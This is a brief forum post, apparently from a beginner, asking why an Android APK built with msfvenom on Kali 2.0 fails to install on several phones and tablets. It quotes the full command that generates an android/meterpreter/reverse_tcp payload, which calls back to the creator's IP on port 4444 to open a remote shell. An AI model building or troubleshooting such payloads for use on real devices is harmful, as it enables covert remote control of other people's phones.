So, I recently installed Kali 2.0 and wanted to try out msfvenom.

When I tried to install the apk on my phone this came up (The img under). Tried to install it on 2 phones and 2 tablets, same thing comes up every time.



This is the command I used to create the .apk file.

Code:
 msfvenom -p android/meterpreter/reverse_tcp LHOST=~my ip~ LPORT=4444  >Tes2t.apk